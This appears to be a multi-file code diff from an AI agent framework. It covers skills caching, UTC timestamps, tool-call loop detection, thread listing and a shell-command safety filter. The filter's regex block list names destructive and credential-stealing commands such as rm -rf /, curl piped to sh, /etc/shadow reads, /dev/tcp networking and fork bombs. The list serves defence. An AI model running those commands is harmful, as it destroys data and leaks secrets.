def warm_enabled_skills_cache(timeout_seconds: float = _ENABLED_SKILLS_REFRESH_WAIT_TIMEOUT_SECONDS) -> bool:
|
||||
if _ensure_enabled_skills_cache().wait(timeout=timeout_seconds):
|
||||
return True
|
||||
|
||||
logger.warning("Timed out waiting %.1fs for enabled skills cache warm-up", timeout_seconds)
|
||||
return False
|
||||
|
||||
|
||||
def _get_enabled_skills():
|
||||
with _enabled_skills_lock:
|
||||
cached = _enabled_skills_cache
|
||||
|
||||
if cached is not None:
|
||||
return list(cached)
|
||||
|
||||
_ensure_enabled_skills_cache()
|
||||
return []
|
||||
|
||||
|
||||
def _skill_mutability_label(category: str) -> str:
|
||||
return "[custom, editable]" if category == "custom" else "[built-in]"
|
||||
|
||||
|
||||
def clear_skills_system_prompt_cache() -> None:
|
||||
_invalidate_enabled_skills_cache()
|
||||
|
||||
|
||||
async def refresh_skills_system_prompt_cache_async() -> None:
|
||||
await asyncio.to_thread(_invalidate_enabled_skills_cache().wait)
|
||||
|
||||
|
||||
def _reset_skills_system_prompt_cache_state() -> None:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active, _enabled_skills_refresh_version
|
||||
|
||||
_get_cached_skills_prompt_section.cache_clear()
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = None
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_version = 0
|
||||
_enabled_skills_refresh_event.clear()
|
||||
|
||||
|
||||
def _refresh_enabled_skills_cache() -> None:
|
||||
"""Backward-compatible test helper for direct synchronous reload."""
|
||||
try:
|
||||
return list(load_skills(enabled_only=True))
|
||||
skills = _load_enabled_skills_sync()
|
||||
except Exception:
|
||||
logger.exception("Failed to load enabled skills for prompt injection")
|
||||
return []
|
||||
skills = []
|
||||
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = skills
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_event.set()
|
||||
|
||||
|
||||
def _build_skill_evolution_section(skill_evolution_enabled: bool) -> str:
|
||||
if not skill_evolution_enabled:
|
||||
return ""
|
||||
return """
|
||||
## Skill Self-Evolution
|
||||
After completing a task, consider creating or updating a skill when:
|
||||
- The task required 5+ tool calls to resolve
|
||||
- You overcame non-obvious errors or pitfalls
|
||||
- The user corrected your approach and the corrected version worked
|
||||
- You discovered a non-trivial, recurring workflow
|
||||
If you used a skill and encountered issues not covered by it, patch it immediately.
|
||||
Prefer patch over edit. Before creating a new skill, confirm with the user first.
|
||||
Skip simple one-off tasks.
|
||||
"""
|
||||
|
||||
|
||||
def _skill_mutability_label(category: str) -> str:
|
||||
@@ -294,6 +441,9 @@ You: "Deploying to staging..." [proceed]
|
||||
- Use `read_file` tool to read uploaded files using their paths from the list
|
||||
- For PDF, PPT, Excel, and Word files, converted Markdown versions (*.md) are available alongside originals
|
||||
- All temporary work happens in `/mnt/user-data/workspace`
|
||||
- Treat `/mnt/user-data/workspace` as your default current working directory for coding and file-editing tasks
|
||||
- When writing scripts or commands that create/read files from the workspace, prefer relative paths such as `hello.txt`, `../uploads/data.csv`, and `../outputs/report.md`
|
||||
- Avoid hardcoding `/mnt/user-data/...` inside generated scripts when a relative path from the workspace is enough
|
||||
- Final deliverables must be copied to `/mnt/user-data/outputs` and presented using `present_file` tool
|
||||
{acp_section}
|
||||
</working_directory>
|
||||
|
||||
@@ -4,7 +4,7 @@ import logging
|
||||
import threading
|
||||
import time
|
||||
from dataclasses import dataclass, field
|
||||
from datetime import datetime
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from deerflow.config.memory_config import get_memory_config
|
||||
@@ -18,7 +18,7 @@ class ConversationContext:
|
||||
|
||||
thread_id: str
|
||||
messages: list[Any]
|
||||
timestamp: datetime = field(default_factory=datetime.utcnow)
|
||||
timestamp: datetime = field(default_factory=lambda: datetime.now(UTC))
|
||||
agent_name: str | None = None
|
||||
correction_detected: bool = False
|
||||
reinforcement_detected: bool = False
|
||||
|
||||
@@ -4,7 +4,7 @@ import abc
|
||||
import json
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime
|
||||
from datetime import UTC, datetime
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
@@ -15,11 +15,16 @@ from deerflow.config.paths import get_paths
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def utc_now_iso_z() -> str:
|
||||
"""Current UTC time as ISO-8601 with ``Z`` suffix (matches prior naive-UTC output)."""
|
||||
return datetime.now(UTC).isoformat().removesuffix("+00:00") + "Z"
|
||||
|
||||
|
||||
def create_empty_memory() -> dict[str, Any]:
|
||||
"""Create an empty memory structure."""
|
||||
return {
|
||||
"version": "1.0",
|
||||
"lastUpdated": datetime.utcnow().isoformat() + "Z",
|
||||
"lastUpdated": utc_now_iso_z(),
|
||||
"user": {
|
||||
"workContext": {"summary": "", "updatedAt": ""},
|
||||
"personalContext": {"summary": "", "updatedAt": ""},
|
||||
@@ -137,7 +142,7 @@ class FileMemoryStorage(MemoryStorage):
|
||||
|
||||
try:
|
||||
file_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
memory_data["lastUpdated"] = datetime.utcnow().isoformat() + "Z"
|
||||
memory_data["lastUpdated"] = utc_now_iso_z()
|
||||
|
||||
temp_path = file_path.with_suffix(".tmp")
|
||||
with open(temp_path, "w", encoding="utf-8") as f:
|
||||
|
||||
@@ -5,14 +5,17 @@ import logging
|
||||
import math
|
||||
import re
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from typing import Any
|
||||
|
||||
from deerflow.agents.memory.prompt import (
|
||||
MEMORY_UPDATE_PROMPT,
|
||||
format_conversation_for_update,
|
||||
)
|
||||
from deerflow.agents.memory.storage import create_empty_memory, get_memory_storage
|
||||
from deerflow.agents.memory.storage import (
|
||||
create_empty_memory,
|
||||
get_memory_storage,
|
||||
utc_now_iso_z,
|
||||
)
|
||||
from deerflow.config.memory_config import get_memory_config
|
||||
from deerflow.models import create_chat_model
|
||||
|
||||
@@ -86,7 +89,7 @@ def create_memory_fact(
|
||||
|
||||
normalized_category = category.strip() or "context"
|
||||
validated_confidence = _validate_confidence(confidence)
|
||||
now = datetime.utcnow().isoformat() + "Z"
|
||||
now = utc_now_iso_z()
|
||||
memory_data = get_memory_data(agent_name)
|
||||
updated_memory = dict(memory_data)
|
||||
facts = list(memory_data.get("facts", []))
|
||||
@@ -376,7 +379,7 @@ class MemoryUpdater:
|
||||
Updated memory data.
|
||||
"""
|
||||
config = get_memory_config()
|
||||
now = datetime.utcnow().isoformat() + "Z"
|
||||
now = utc_now_iso_z()
|
||||
|
||||
# Update user sections
|
||||
user_updates = update_data.get("user", {})
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
"""Middleware for intercepting clarification requests and presenting them to the user."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from collections.abc import Callable
|
||||
from typing import override
|
||||
@@ -60,6 +61,20 @@ class ClarificationMiddleware(AgentMiddleware[ClarificationMiddlewareState]):
|
||||
context = args.get("context")
|
||||
options = args.get("options", [])
|
||||
|
||||
# Some models (e.g. Qwen3-Max) serialize array parameters as JSON strings
|
||||
# instead of native arrays. Deserialize and normalize so `options`
|
||||
# is always a list for the rendering logic below.
|
||||
if isinstance(options, str):
|
||||
try:
|
||||
options = json.loads(options)
|
||||
except (json.JSONDecodeError, TypeError):
|
||||
options = [options]
|
||||
|
||||
if options is None:
|
||||
options = []
|
||||
elif not isinstance(options, list):
|
||||
options = [options]
|
||||
|
||||
# Type-specific icons
|
||||
type_icons = {
|
||||
"missing_info": "❓",
|
||||
|
||||
@@ -33,30 +33,92 @@ _DEFAULT_WINDOW_SIZE = 20 # track last N tool calls
|
||||
_DEFAULT_MAX_TRACKED_THREADS = 100 # LRU eviction limit
|
||||
|
||||
|
||||
def _normalize_tool_call_args(raw_args: object) -> tuple[dict, str | None]:
|
||||
"""Normalize tool call args to a dict plus an optional fallback key.
|
||||
|
||||
Some providers serialize ``args`` as a JSON string instead of a dict.
|
||||
We defensively parse those cases so loop detection does not crash while
|
||||
still preserving a stable fallback key for non-dict payloads.
|
||||
"""
|
||||
if isinstance(raw_args, dict):
|
||||
return raw_args, None
|
||||
|
||||
if isinstance(raw_args, str):
|
||||
try:
|
||||
parsed = json.loads(raw_args)
|
||||
except (TypeError, ValueError, json.JSONDecodeError):
|
||||
return {}, raw_args
|
||||
|
||||
if isinstance(parsed, dict):
|
||||
return parsed, None
|
||||
return {}, json.dumps(parsed, sort_keys=True, default=str)
|
||||
|
||||
if raw_args is None:
|
||||
return {}, None
|
||||
|
||||
return {}, json.dumps(raw_args, sort_keys=True, default=str)
|
||||
|
||||
|
||||
def _stable_tool_key(name: str, args: dict, fallback_key: str | None) -> str:
|
||||
"""Derive a stable key from salient args without overfitting to noise."""
|
||||
if name == "read_file" and fallback_key is None:
|
||||
path = args.get("path") or ""
|
||||
start_line = args.get("start_line")
|
||||
end_line = args.get("end_line")
|
||||
|
||||
bucket_size = 200
|
||||
try:
|
||||
start_line = int(start_line) if start_line is not None else 1
|
||||
except (TypeError, ValueError):
|
||||
start_line = 1
|
||||
try:
|
||||
end_line = int(end_line) if end_line is not None else start_line
|
||||
except (TypeError, ValueError):
|
||||
end_line = start_line
|
||||
|
||||
start_line, end_line = sorted((start_line, end_line))
|
||||
bucket_start = max(start_line, 1)
|
||||
bucket_end = max(end_line, 1)
|
||||
bucket_start = (bucket_start - 1) // bucket_size
|
||||
bucket_end = (bucket_end - 1) // bucket_size
|
||||
return f"{path}:{bucket_start}-{bucket_end}"
|
||||
|
||||
# write_file / str_replace are content-sensitive: same path may be updated
|
||||
# with different payloads during iteration. Using only salient fields (path)
|
||||
# can collapse distinct calls, so we hash full args to reduce false positives.
|
||||
if name in {"write_file", "str_replace"}:
|
||||
if fallback_key is not None:
|
||||
return fallback_key
|
||||
return json.dumps(args, sort_keys=True, default=str)
|
||||
|
||||
salient_fields = ("path", "url", "query", "command", "pattern", "glob", "cmd")
|
||||
stable_args = {field: args[field] for field in salient_fields if args.get(field) is not None}
|
||||
if stable_args:
|
||||
return json.dumps(stable_args, sort_keys=True, default=str)
|
||||
|
||||
if fallback_key is not None:
|
||||
return fallback_key
|
||||
|
||||
return json.dumps(args, sort_keys=True, default=str)
|
||||
|
||||
|
||||
def _hash_tool_calls(tool_calls: list[dict]) -> str:
|
||||
"""Deterministic hash of a set of tool calls (name + args).
|
||||
"""Deterministic hash of a set of tool calls (name + stable key).
|
||||
|
||||
This is intended to be order-independent: the same multiset of tool calls
|
||||
should always produce the same hash, regardless of their input order.
|
||||
"""
|
||||
# First normalize each tool call to a minimal (name, args) structure.
|
||||
normalized: list[dict] = []
|
||||
# Normalize each tool call to a stable (name, key) structure.
|
||||
normalized: list[str] = []
|
||||
for tc in tool_calls:
|
||||
normalized.append(
|
||||
{
|
||||
"name": tc.get("name", ""),
|
||||
"args": tc.get("args", {}),
|
||||
}
|
||||
)
|
||||
name = tc.get("name", "")
|
||||
args, fallback_key = _normalize_tool_call_args(tc.get("args", {}))
|
||||
key = _stable_tool_key(name, args, fallback_key)
|
||||
|
||||
# Sort by both name and a deterministic serialization of args so that
|
||||
# permutations of the same multiset of calls yield the same ordering.
|
||||
normalized.sort(
|
||||
key=lambda tc: (
|
||||
tc["name"],
|
||||
json.dumps(tc["args"], sort_keys=True, default=str),
|
||||
)
|
||||
)
|
||||
normalized.append(f"{name}:{key}")
|
||||
|
||||
# Sort so permutations of the same multiset of calls yield the same ordering.
|
||||
normalized.sort()
|
||||
blob = json.dumps(normalized, sort_keys=True, default=str)
|
||||
return hashlib.md5(blob.encode()).hexdigest()[:12]
|
||||
|
||||
|
||||
@@ -23,25 +23,119 @@ logger = logging.getLogger(__name__)
|
||||
|
||||
# Each pattern is compiled once at import time.
|
||||
_HIGH_RISK_PATTERNS: list[re.Pattern[str]] = [
|
||||
re.compile(r"rm\s+-[^\s]*r[^\s]*\s+(/\*?|~/?\*?|/home\b|/root\b)\s*$"), # rm -rf / /* ~ /home /root
|
||||
re.compile(r"(curl|wget).+\|\s*(ba)?sh"), # curl|sh, wget|sh
|
||||
# --- original rules (retained) ---
|
||||
re.compile(r"rm\s+-[^\s]*r[^\s]*\s+(/\*?|~/?\*?|/home\b|/root\b)\s*$"),
|
||||
re.compile(r"dd\s+if="),
|
||||
re.compile(r"mkfs"),
|
||||
re.compile(r"cat\s+/etc/shadow"),
|
||||
re.compile(r">\s*/etc/"), # overwrite /etc/ files
|
||||
re.compile(r">+\s*/etc/"),
|
||||
# --- pipe to sh/bash (generalised, replaces old curl|sh rule) ---
|
||||
re.compile(r"\|\s*(ba)?sh\b"),
|
||||
# --- command substitution (targeted – only dangerous executables) ---
|
||||
re.compile(r"[`$]\(?\s*(curl|wget|bash|sh|python|ruby|perl|base64)"),
|
||||
# --- base64 decode piped to execution ---
|
||||
re.compile(r"base64\s+.*-d.*\|"),
|
||||
# --- overwrite system binaries ---
|
||||
re.compile(r">+\s*(/usr/bin/|/bin/|/sbin/)"),
|
||||
# --- overwrite shell startup files ---
|
||||
re.compile(r">+\s*~/?\.(bashrc|profile|zshrc|bash_profile)"),
|
||||
# --- process environment leakage ---
|
||||
re.compile(r"/proc/[^/]+/environ"),
|
||||
# --- dynamic linker hijack (one-step escalation) ---
|
||||
re.compile(r"\b(LD_PRELOAD|LD_LIBRARY_PATH)\s*="),
|
||||
# --- bash built-in networking (bypasses tool allowlists) ---
|
||||
re.compile(r"/dev/tcp/"),
|
||||
# --- fork bomb ---
|
||||
re.compile(r"\S+\(\)\s*\{[^}]*\|\s*\S+\s*&"), # :(){ :|:& };:
|
||||
re.compile(r"while\s+true.*&\s*done"), # while true; do bash & done
|
||||
]
|
||||
|
||||
_MEDIUM_RISK_PATTERNS: list[re.Pattern[str]] = [
|
||||
re.compile(r"chmod\s+777"), # overly permissive, but reversible
|
||||
re.compile(r"pip\s+install"),
|
||||
re.compile(r"pip3\s+install"),
|
||||
re.compile(r"chmod\s+777"),
|
||||
re.compile(r"pip3?\s+install"),
|
||||
re.compile(r"apt(-get)?\s+install"),
|
||||
# sudo/su: no-op under Docker root; warn so LLM is aware
|
||||
re.compile(r"\b(sudo|su)\b"),
|
||||
# PATH modification: long attack chain, warn rather than block
|
||||
re.compile(r"\bPATH\s*="),
|
||||
]
|
||||
|
||||
|
||||
def _classify_command(command: str) -> str:
|
||||
"""Return 'block', 'warn', or 'pass'."""
|
||||
# Normalize for matching (collapse whitespace)
|
||||
def _split_compound_command(command: str) -> list[str]:
|
||||
"""Split a compound command into sub-commands (quote-aware).
|
||||
|
||||
Scans the raw command string so unquoted shell control operators are
|
||||
recognised even when they are not surrounded by whitespace
|
||||
(e.g. ``safe;rm -rf /`` or ``rm -rf /&&echo ok``). Operators inside
|
||||
quotes are ignored. If the command ends with an unclosed quote or a
|
||||
dangling escape, return the whole command unchanged (fail-closed —
|
||||
safer to classify the unsplit string than silently drop parts).
|
||||
"""
|
||||
parts: list[str] = []
|
||||
current: list[str] = []
|
||||
in_single_quote = False
|
||||
in_double_quote = False
|
||||
escaping = False
|
||||
index = 0
|
||||
|
||||
while index < len(command):
|
||||
char = command[index]
|
||||
|
||||
if escaping:
|
||||
current.append(char)
|
||||
escaping = False
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == "\\" and not in_single_quote:
|
||||
current.append(char)
|
||||
escaping = True
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == "'" and not in_double_quote:
|
||||
in_single_quote = not in_single_quote
|
||||
current.append(char)
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == '"' and not in_single_quote:
|
||||
in_double_quote = not in_double_quote
|
||||
current.append(char)
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if not in_single_quote and not in_double_quote:
|
||||
if command.startswith("&&", index) or command.startswith("||", index):
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
current = []
|
||||
index += 2
|
||||
continue
|
||||
if char == ";":
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
current = []
|
||||
index += 1
|
||||
continue
|
||||
|
||||
current.append(char)
|
||||
index += 1
|
||||
|
||||
# Unclosed quote or dangling escape → fail-closed, return whole command
|
||||
if in_single_quote or in_double_quote or escaping:
|
||||
return [command]
|
||||
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
return parts if parts else [command]
|
||||
|
||||
|
||||
def _classify_single_command(command: str) -> str:
|
||||
"""Classify a single (non-compound) command. Return 'block', 'warn', or 'pass'."""
|
||||
normalized = " ".join(command.split())
|
||||
|
||||
for pattern in _HIGH_RISK_PATTERNS:
|
||||
@@ -66,6 +160,35 @@ def _classify_command(command: str) -> str:
|
||||
return "pass"
|
||||
|
||||
|
||||
def _classify_command(command: str) -> str:
|
||||
"""Return 'block', 'warn', or 'pass'.
|
||||
|
||||
Strategy:
|
||||
1. First scan the *whole* raw command against high-risk patterns. This
|
||||
catches structural attacks like ``while true; do bash & done`` or
|
||||
``:(){ :|:& };:`` that span multiple shell statements — splitting them
|
||||
on ``;`` would destroy the pattern context.
|
||||
2. Then split compound commands (e.g. ``cmd1 && cmd2 ; cmd3``) and
|
||||
classify each sub-command independently. The most severe verdict wins.
|
||||
"""
|
||||
# Pass 1: whole-command high-risk scan (catches multi-statement patterns)
|
||||
normalized = " ".join(command.split())
|
||||
for pattern in _HIGH_RISK_PATTERNS:
|
||||
if pattern.search(normalized):
|
||||
return "block"
|
||||
|
||||
# Pass 2: per-sub-command classification
|
||||
sub_commands = _split_compound_command(command)
|
||||
worst = "pass"
|
||||
for sub in sub_commands:
|
||||
verdict = _classify_single_command(sub)
|
||||
if verdict == "block":
|
||||
return "block" # short-circuit: can't get worse
|
||||
if verdict == "warn":
|
||||
worst = "warn"
|
||||
return worst
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Middleware
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
"""Middleware for automatic thread title generation."""
|
||||
|
||||
import logging
|
||||
from typing import NotRequired, override
|
||||
from typing import Any, NotRequired, override
|
||||
|
||||
from langchain.agents import AgentState
|
||||
from langchain.agents.middleware import AgentMiddleware
|
||||
from langgraph.config import get_config
|
||||
from langgraph.runtime import Runtime
|
||||
|
||||
from deerflow.config.title_config import get_title_config
|
||||
@@ -100,6 +101,20 @@ class TitleMiddleware(AgentMiddleware[TitleMiddlewareState]):
|
||||
return user_msg[:fallback_chars].rstrip() + "..."
|
||||
return user_msg if user_msg else "New Conversation"
|
||||
|
||||
def _get_runnable_config(self) -> dict[str, Any]:
|
||||
"""Inherit the parent RunnableConfig and add middleware tag.
|
||||
|
||||
This ensures RunJournal identifies LLM calls from this middleware
|
||||
as ``middleware:title`` instead of ``lead_agent``.
|
||||
"""
|
||||
try:
|
||||
parent = get_config()
|
||||
except Exception:
|
||||
parent = {}
|
||||
config = {**parent}
|
||||
config["tags"] = [*(config.get("tags") or []), "middleware:title"]
|
||||
return config
|
||||
|
||||
def _generate_title_result(self, state: TitleMiddlewareState) -> dict | None:
|
||||
"""Generate a local fallback title without blocking on an LLM call."""
|
||||
if not self._should_generate_title(state):
|
||||
@@ -121,7 +136,7 @@ class TitleMiddleware(AgentMiddleware[TitleMiddlewareState]):
|
||||
model = create_chat_model(name=config.model_name, thinking_enabled=False)
|
||||
else:
|
||||
model = create_chat_model(thinking_enabled=False)
|
||||
response = await model.ainvoke(prompt)
|
||||
response = await model.ainvoke(prompt, config=self._get_runnable_config())
|
||||
title = self._parse_title(response.content)
|
||||
if title:
|
||||
return {"title": title}
|
||||
|
||||
@@ -25,7 +25,7 @@ import uuid
|
||||
from collections.abc import Generator, Sequence
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from typing import Any, Literal
|
||||
|
||||
from langchain.agents import create_agent
|
||||
from langchain.agents.middleware import AgentMiddleware
|
||||
@@ -55,6 +55,9 @@ from deerflow.uploads.manager import (
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
StreamEventType = Literal["values", "messages-tuple", "custom", "end"]
|
||||
|
||||
|
||||
@dataclass
|
||||
class StreamEvent:
|
||||
"""A single event from the streaming agent response.
|
||||
@@ -69,7 +72,7 @@ class StreamEvent:
|
||||
data: Event payload. Contents vary by type.
|
||||
"""
|
||||
|
||||
type: str
|
||||
type: StreamEventType
|
||||
data: dict[str, Any] = field(default_factory=dict)
|
||||
|
||||
|
||||
@@ -254,13 +257,53 @@ class DeerFlowClient:
|
||||
|
||||
return get_available_tools(model_name=model_name, subagent_enabled=subagent_enabled)
|
||||
|
||||
@staticmethod
|
||||
def _serialize_tool_calls(tool_calls) -> list[dict]:
|
||||
"""Reshape LangChain tool_calls into the wire format used in events."""
|
||||
return [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in tool_calls]
|
||||
|
||||
@staticmethod
|
||||
def _ai_text_event(msg_id: str | None, text: str, usage: dict | None) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` AI text event, attaching usage when present."""
|
||||
data: dict[str, Any] = {"type": "ai", "content": text, "id": msg_id}
|
||||
if usage:
|
||||
data["usage_metadata"] = usage
|
||||
return StreamEvent(type="messages-tuple", data=data)
|
||||
|
||||
@staticmethod
|
||||
def _ai_tool_calls_event(msg_id: str | None, tool_calls) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` AI tool-calls event."""
|
||||
return StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "ai",
|
||||
"content": "",
|
||||
"id": msg_id,
|
||||
"tool_calls": DeerFlowClient._serialize_tool_calls(tool_calls),
|
||||
},
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _tool_message_event(msg: ToolMessage) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` tool-result event from a ToolMessage."""
|
||||
return StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "tool",
|
||||
"content": DeerFlowClient._extract_text(msg.content),
|
||||
"name": msg.name,
|
||||
"tool_call_id": msg.tool_call_id,
|
||||
"id": msg.id,
|
||||
},
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _serialize_message(msg) -> dict:
|
||||
"""Serialize a LangChain message to a plain dict for values events."""
|
||||
if isinstance(msg, AIMessage):
|
||||
d: dict[str, Any] = {"type": "ai", "content": msg.content, "id": getattr(msg, "id", None)}
|
||||
if msg.tool_calls:
|
||||
d["tool_calls"] = [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in msg.tool_calls]
|
||||
d["tool_calls"] = DeerFlowClient._serialize_tool_calls(msg.tool_calls)
|
||||
if getattr(msg, "usage_metadata", None):
|
||||
d["usage_metadata"] = msg.usage_metadata
|
||||
return d
|
||||
@@ -315,6 +358,108 @@ class DeerFlowClient:
|
||||
return "\n".join(pieces) if pieces else ""
|
||||
return str(content)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API — threads
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def list_threads(self, limit: int = 10) -> dict:
|
||||
"""List the recent N threads.
|
||||
|
||||
Args:
|
||||
limit: Maximum number of threads to return. Default is 10.
|
||||
|
||||
Returns:
|
||||
Dict with "thread_list" key containing list of thread info dicts,
|
||||
sorted by thread creation time descending.
|
||||
"""
|
||||
checkpointer = self._checkpointer
|
||||
if checkpointer is None:
|
||||
from deerflow.agents.checkpointer.provider import get_checkpointer
|
||||
|
||||
checkpointer = get_checkpointer()
|
||||
|
||||
thread_info_map = {}
|
||||
|
||||
for cp in checkpointer.list(config=None, limit=limit):
|
||||
cfg = cp.config.get("configurable", {})
|
||||
thread_id = cfg.get("thread_id")
|
||||
if not thread_id:
|
||||
continue
|
||||
|
||||
ts = cp.checkpoint.get("ts")
|
||||
checkpoint_id = cfg.get("checkpoint_id")
|
||||
|
||||
if thread_id not in thread_info_map:
|
||||
channel_values = cp.checkpoint.get("channel_values", {})
|
||||
thread_info_map[thread_id] = {
|
||||
"thread_id": thread_id,
|
||||
"created_at": ts,
|
||||
"updated_at": ts,
|
||||
"latest_checkpoint_id": checkpoint_id,
|
||||
"title": channel_values.get("title"),
|
||||
}
|
||||
else:
|
||||
# Explicitly compare timestamps to ensure accuracy when iterating over unordered namespaces.
|
||||
# Treat None as "missing" and only compare when existing values are non-None.
|
||||
if ts is not None:
|
||||
current_created = thread_info_map[thread_id]["created_at"]
|
||||
if current_created is None or ts < current_created:
|
||||
thread_info_map[thread_id]["created_at"] = ts
|
||||
|
||||
current_updated = thread_info_map[thread_id]["updated_at"]
|
||||
if current_updated is None or ts > current_updated:
|
||||
thread_info_map[thread_id]["updated_at"] = ts
|
||||
thread_info_map[thread_id]["latest_checkpoint_id"] = checkpoint_id
|
||||
channel_values = cp.checkpoint.get("channel_values", {})
|
||||
thread_info_map[thread_id]["title"] = channel_values.get("title")
|
||||
|
||||
threads = list(thread_info_map.values())
|
||||
threads.sort(key=lambda x: x.get("created_at") or "", reverse=True)
|
||||
|
||||
return {"thread_list": threads[:limit]}
|
||||
|
||||
def get_thread(self, thread_id: str) -> dict:
|
||||
"""Get the complete thread record, including all node execution records.
|
||||
|
||||
Args:
|
||||
thread_id: Thread ID.
|
||||
|
||||
Returns:
|
||||
Dict containing the thread's full checkpoint history.
|
||||
"""
|
||||
checkpointer = self._checkpointer
|
||||
if checkpointer is None:
|
||||
from deerflow.agents.checkpointer.provider import get_checkpointer
|
||||
|
||||
checkpointer = get_checkpointer()
|
||||
|
||||
config = {"configurable": {"thread_id": thread_id}}
|
||||
checkpoints = []
|
||||
|
||||
for cp in checkpointer.list(config):
|
||||
channel_values = dict(cp.checkpoint.get("channel_values", {}))
|
||||
if "messages" in channel_values:
|
||||
channel_values["messages"] = [self._serialize_message(m) if hasattr(m, "content") else m for m in channel_values["messages"]]
|
||||
|
||||
cfg = cp.config.get("configurable", {})
|
||||
parent_cfg = cp.parent_config.get("configurable", {}) if cp.parent_config else {}
|
||||
|
||||
checkpoints.append(
|
||||
{
|
||||
"checkpoint_id": cfg.get("checkpoint_id"),
|
||||
"parent_checkpoint_id": parent_cfg.get("checkpoint_id"),
|
||||
"ts": cp.checkpoint.get("ts"),
|
||||
"metadata": cp.metadata,
|
||||
"values": channel_values,
|
||||
"pending_writes": [{"task_id": w[0], "channel": w[1], "value": w[2]} for w in getattr(cp, "pending_writes", [])],
|
||||
}
|
||||
)
|
||||
|
||||
# Sort globally by timestamp to prevent partial ordering issues caused by different namespaces (e.g., subgraphs)
|
||||
checkpoints.sort(key=lambda x: x["ts"] if x["ts"] else "")
|
||||
|
||||
return {"thread_id": thread_id, "checkpoints": checkpoints}
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API — conversation
|
||||
# ------------------------------------------------------------------
|
||||
@@ -336,6 +481,53 @@ class DeerFlowClient:
|
||||
consumers can switch between HTTP streaming and embedded mode
|
||||
without changing their event-handling logic.
|
||||
|
||||
Token-level streaming
|
||||
~~~~~~~~~~~~~~~~~~~~~
|
||||
This method subscribes to LangGraph's ``messages`` stream mode, so
|
||||
``messages-tuple`` events for AI text are emitted as **deltas** as
|
||||
the model generates tokens, not as one cumulative dump at node
|
||||
completion. Each delta carries a stable ``id`` — consumers that
|
||||
want the full text must accumulate ``content`` per ``id``.
|
||||
``chat()`` already does this for you.
|
||||
|
||||
Tool calls and tool results are still emitted once per logical
|
||||
message. ``values`` events continue to carry full state snapshots
|
||||
after each graph node finishes; AI text already delivered via the
|
||||
``messages`` stream is **not** re-synthesized from the snapshot to
|
||||
avoid duplicate deliveries.
|
||||
|
||||
Why not reuse Gateway's ``run_agent``?
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Gateway (``runtime/runs/worker.py``) has a complete streaming
|
||||
pipeline: ``run_agent`` → ``StreamBridge`` → ``sse_consumer``. It
|
||||
looks like this client duplicates that work, but the two paths
|
||||
serve different audiences and **cannot** share execution:
|
||||
|
||||
* ``run_agent`` is ``async def`` and uses ``agent.astream()``;
|
||||
this method is a sync generator using ``agent.stream()`` so
|
||||
callers can write ``for event in client.stream(...)`` without
|
||||
touching asyncio. Bridging the two would require spinning up
|
||||
an event loop + thread per call.
|
||||
* Gateway events are JSON-serialized by ``serialize()`` for SSE
|
||||
wire transmission. This client yields in-process stream event
|
||||
payloads directly as Python data structures (``StreamEvent``
|
||||
with ``data`` as a plain ``dict``), without the extra
|
||||
JSON/SSE serialization layer used for HTTP delivery.
|
||||
* ``StreamBridge`` is an asyncio-queue decoupling producers from
|
||||
consumers across an HTTP boundary (``Last-Event-ID`` replay,
|
||||
heartbeats, multi-subscriber fan-out). A single in-process
|
||||
caller with a direct iterator needs none of that.
|
||||
|
||||
So ``DeerFlowClient.stream()`` is a parallel, sync, in-process
|
||||
consumer of the same ``create_agent()`` factory — not a wrapper
|
||||
around Gateway. The two paths **should** stay in sync on which
|
||||
LangGraph stream modes they subscribe to; that invariant is
|
||||
enforced by ``tests/test_client.py::test_messages_mode_emits_token_deltas``
|
||||
rather than by a shared constant, because the three layers
|
||||
(Graph, Platform SDK, HTTP) each use their own naming
|
||||
(``messages`` vs ``messages-tuple``) and cannot literally share
|
||||
a string.
|
||||
|
||||
Args:
|
||||
message: User message text.
|
||||
thread_id: Thread ID for conversation context. Auto-generated if None.
|
||||
@@ -346,8 +538,8 @@ class DeerFlowClient:
|
||||
StreamEvent with one of:
|
||||
- type="values" data={"title": str|None, "messages": [...], "artifacts": [...]}
|
||||
- type="custom" data={...}
|
||||
- type="messages-tuple" data={"type": "ai", "content": str, "id": str}
|
||||
